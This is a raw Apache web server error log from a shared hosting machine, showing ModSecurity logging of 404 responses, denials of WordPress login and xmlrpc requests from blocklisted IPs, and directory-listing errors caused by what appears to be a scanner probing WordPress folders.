[Tue May 26 17:14:21.897849 2026] [security2:error] [pid 860158:tid 860392] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHlYYFlz_JJsUnscLDqwAAAO0"]
[Tue May 26 17:14:22.150258 2026] [security2:error] [pid 860158:tid 860354] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHloYFlz_JJsUnscLDtwAAAMc"]
[Tue May 26 17:14:22.385034 2026] [autoindex:error] [pid 860158:tid 860353] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-content/themes/twentytwentyfour/patterns/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:22.977242 2026] [security2:error] [pid 860158:tid 860319] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHloYFlz_JJsUnscLDygAAAKQ"]
[Tue May 26 17:14:23.484519 2026] [security2:error] [pid 860158:tid 860290] [client 173.239.240.55:56273] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahWHl4YFlz_JJsUnscLD3wAAAIc"]
[Tue May 26 17:14:23.574698 2026] [security2:error] [pid 860158:tid 860396] [client 173.239.240.48:20729] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 48.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahWHl4YFlz_JJsUnscLD4AAAAPE"]
[Tue May 26 17:14:23.599442 2026] [security2:error] [pid 860158:tid 860318] [client 173.239.240.57:24315] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahWHl4YFlz_JJsUnscLD3gAAAKM"]
[Tue May 26 17:14:24.056887 2026] [security2:error] [pid 860158:tid 860399] [client 203.194.101.7:51430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHmIYFlz_JJsUnscLD_AAAAPQ"]
[Tue May 26 17:14:24.057119 2026] [security2:error] [pid 860158:tid 860399] [client 203.194.101.7:51430] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHmIYFlz_JJsUnscLD_AAAAPQ"]
[Tue May 26 17:14:24.302513 2026] [core:alert] [pid 860158:tid 860334] [client 147.185.132.13:0] /home2/debatqhn/gbogbonise.com/.htaccess: </IfModule> without matching <IfModule> section
[Tue May 26 17:14:24.829366 2026] [security2:error] [pid 860158:tid 860324] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHmIYFlz_JJsUnscLEBwAAAKk"]
[Tue May 26 17:14:25.844608 2026] [security2:error] [pid 860158:tid 860410] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHmYYFlz_JJsUnscLEMgAAAP8"]
[Tue May 26 17:14:26.455978 2026] [security2:error] [pid 860158:tid 860179] [remote 109.205.180.55:36688] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.180.205.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWHmoYFlz_JJsUnscLEPAAA7hQ"]
[Tue May 26 17:14:26.693871 2026] [security2:error] [pid 860158:tid 860322] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHmoYFlz_JJsUnscLESQAAAKc"]
[Tue May 26 17:14:26.860617 2026] [security2:error] [pid 860158:tid 860380] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHmoYFlz_JJsUnscLEPwAAAOE"]
[Tue May 26 17:14:26.943142 2026] [security2:error] [pid 860158:tid 860335] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHmoYFlz_JJsUnscLEUgAAALQ"]
[Tue May 26 17:14:27.173076 2026] [security2:error] [pid 860158:tid 860313] [client 45.86.200.6:63253] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHm4YFlz_JJsUnscLEVQAAAJ4"]
[Tue May 26 17:14:27.486023 2026] [security2:error] [pid 860158:tid 860362] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHm4YFlz_JJsUnscLEYQAAAM8"]
[Tue May 26 17:14:27.858703 2026] [autoindex:error] [pid 860158:tid 860374] [client 45.86.200.6:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/js/imgareaselect/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:28.181183 2026] [security2:error] [pid 860158:tid 860350] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHnIYFlz_JJsUnscLEdgAAAMM"]
[Tue May 26 17:14:28.421264 2026] [security2:error] [pid 860158:tid 860295] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHnIYFlz_JJsUnscLEfAAAAIw"]
[Tue May 26 17:14:28.658789 2026] [autoindex:error] [pid 860158:tid 860387] [client 45.86.200.6:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/sodium_compat/lib/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:28.868650 2026] [autoindex:error] [pid 860158:tid 860359] [client 45.86.200.6:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/js/jcrop/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:29.106918 2026] [security2:error] [pid 860158:tid 860310] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHnIYFlz_JJsUnscLEjAAAAJs"]
[Tue May 26 17:14:29.142503 2026] [security2:error] [pid 860158:tid 860298] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHnYYFlz_JJsUnscLEnQAAAI8"]
[Tue May 26 17:14:29.190425 2026] [security2:error] [pid 860158:tid 860344] [client 207.46.13.125:18714] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahWHnIYFlz_JJsUnscLEhgAAvQ0"]
[Tue May 26 17:14:29.443044 2026] [security2:error] [pid 860158:tid 860323] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHnYYFlz_JJsUnscLErgAAAKg"]
[Tue May 26 17:14:29.680772 2026] [autoindex:error] [pid 860158:tid 860333] [client 45.86.200.6:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/block-bindings/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:30.017176 2026] [security2:error] [pid 860158:tid 860399] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHnYYFlz_JJsUnscLEvQAAAPQ"]
[Tue May 26 17:14:30.255945 2026] [autoindex:error] [pid 860158:tid 860306] [client 45.86.200.6:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/Requests/library/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:30.498873 2026] [security2:error] [pid 860158:tid 860341] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHnoYFlz_JJsUnscLE1AAAALo"]
[Tue May 26 17:14:30.725420 2026] [security2:error] [pid 860158:tid 860331] [client 45.86.200.6:63253] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHnoYFlz_JJsUnscLE1QAAALA"]
[Tue May 26 17:14:31.079873 2026] [security2:error] [pid 860158:tid 860324] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHn4YFlz_JJsUnscLE5AAAAKk"]
[Tue May 26 17:14:31.329510 2026] [security2:error] [pid 860158:tid 860365] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHn4YFlz_JJsUnscLE7gAAANI"]
[Tue May 26 17:14:31.413194 2026] [security2:error] [pid 860158:tid 860343] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHnoYFlz_JJsUnscLE4QAAALw"]
[Tue May 26 17:14:31.582417 2026] [security2:error] [pid 860158:tid 860376] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHn4YFlz_JJsUnscLE-gAAAN0"]
[Tue May 26 17:14:31.822889 2026] [security2:error] [pid 860158:tid 860363] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHn4YFlz_JJsUnscLE_gAAANA"]
[Tue May 26 17:14:32.129936 2026] [security2:error] [pid 860158:tid 860305] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHoIYFlz_JJsUnscLFCgAAAJY"]
[Tue May 26 17:14:32.454440 2026] [security2:error] [pid 860158:tid 860316] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHoIYFlz_JJsUnscLFGgAAAKE"]
[Tue May 26 17:14:32.767447 2026] [security2:error] [pid 860158:tid 860413] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHoIYFlz_JJsUnscLFJwAAAQI"]
[Tue May 26 17:14:33.147476 2026] [security2:error] [pid 860158:tid 860339] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHoYYFlz_JJsUnscLFNAAAALg"]
[Tue May 26 17:14:33.245986 2026] [security2:error] [pid 860158:tid 860290] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHoIYFlz_JJsUnscLFKgAAAIc"]
[Tue May 26 17:14:33.623616 2026] [security2:error] [pid 860158:tid 860315] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHoYYFlz_JJsUnscLFPwAAAKA"]
[Tue May 26 17:14:33.973808 2026] [security2:error] [pid 860158:tid 860288] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHoYYFlz_JJsUnscLFRQAAAIU"]
[Tue May 26 17:14:34.257671 2026] [security2:error] [pid 860158:tid 860393] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHooYFlz_JJsUnscLFVQAAAO4"]
[Tue May 26 17:14:34.546131 2026] [security2:error] [pid 860158:tid 860338] [client 203.194.101.7:51771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHooYFlz_JJsUnscLFWAAAALc"]
[Tue May 26 17:14:34.546303 2026] [security2:error] [pid 860158:tid 860338] [client 203.194.101.7:51771] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHooYFlz_JJsUnscLFWAAAALc"]
[Tue May 26 17:14:34.641015 2026] [security2:error] [pid 860158:tid 860302] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHooYFlz_JJsUnscLFWQAAAJM"]
[Tue May 26 17:14:34.961663 2026] [autoindex:error] [pid 860158:tid 860310] [client 45.86.200.6:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/js/tinymce/skins/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:35.258452 2026] [security2:error] [pid 860158:tid 860301] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHo4YFlz_JJsUnscLFfAAAAJI"]
[Tue May 26 17:14:35.416923 2026] [security2:error] [pid 860158:tid 860337] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHo4YFlz_JJsUnscLFaQAAALY"]
[Tue May 26 17:14:35.507514 2026] [security2:error] [pid 860158:tid 860370] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHo4YFlz_JJsUnscLFggAAANc"]
[Tue May 26 17:14:35.682158 2026] [autoindex:error] [pid 860158:tid 860288] [client 45.86.200.6:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/js/jquery/ui/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:35.898858 2026] [security2:error] [pid 860158:tid 860335] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHo4YFlz_JJsUnscLFlwAAALQ"]
[Tue May 26 17:14:36.276161 2026] [security2:error] [pid 860158:tid 860316] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHpIYFlz_JJsUnscLFrwAAAKE"]
[Tue May 26 17:14:36.327090 2026] [security2:error] [pid 860158:tid 860352] [client 198.190.6.236:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWHpIYFlz_JJsUnscLFtAAAAMU"], referer: http://www.anujtradingco.com/
[Tue May 26 17:14:36.639233 2026] [autoindex:error] [pid 860158:tid 860359] [client 45.86.200.6:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/js/tinymce/themes/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:36.875651 2026] [security2:error] [pid 860158:tid 860379] [client 45.86.200.6:63253] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHpIYFlz_JJsUnscLFwwAAAOA"]
[Tue May 26 17:14:37.112913 2026] [security2:error] [pid 860158:tid 860304] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHpYYFlz_JJsUnscLFzQAAAJU"]
[Tue May 26 17:14:37.299047 2026] [security2:error] [pid 860158:tid 860400] [client 182.8.122.143:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHpIYFlz_JJsUnscLFyQAAAPU"]
[Tue May 26 17:14:37.492123 2026] [security2:error] [pid 860158:tid 860291] [client 198.190.6.236:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWHpYYFlz_JJsUnscLF4AAAAIg"], referer: http://www.anujtradingco.com/shop-2/lookbook-metro/
[Tue May 26 17:14:37.505448 2026] [autoindex:error] [pid 860158:tid 860381] [client 45.86.200.6:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/js/tinymce/themes/inlite/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:37.547644 2026] [security2:error] [pid 860158:tid 860348] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHpYYFlz_JJsUnscLF0QAAAME"]
[Tue May 26 17:14:37.782150 2026] [security2:error] [pid 860158:tid 860338] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHpYYFlz_JJsUnscLF6QAAALc"]
[Tue May 26 17:14:37.973490 2026] [autoindex:error] [pid 860158:tid 860307] [client 45.86.200.6:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/js/plupload/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:38.184290 2026] [autoindex:error] [pid 860158:tid 860290] [client 45.86.200.6:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/rest-api/fields/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:38.455854 2026] [security2:error] [pid 860158:tid 860405] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHpoYFlz_JJsUnscLGAwAAAPo"]
[Tue May 26 17:14:38.648057 2026] [autoindex:error] [pid 860158:tid 860312] [client 45.86.200.6:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/blocks/code/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
